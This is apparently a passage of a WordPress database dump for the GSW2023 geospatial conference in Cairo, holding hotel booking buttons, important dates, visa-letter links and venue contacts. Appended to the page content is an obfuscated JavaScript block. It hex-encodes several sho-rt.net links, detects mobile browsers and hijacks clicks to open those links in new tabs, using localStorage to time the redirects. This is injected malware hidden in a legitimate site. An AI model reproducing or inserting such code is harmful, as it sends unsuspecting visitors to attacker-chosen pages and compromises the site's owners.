link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 00:21:38','2023-08-16 00:21:38','',3066,'https://gsw2023.com/?p=5244',0,'revision','',0),
(5245,1,'2023-08-16 00:23:15','2023-08-16 00:23:15','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" 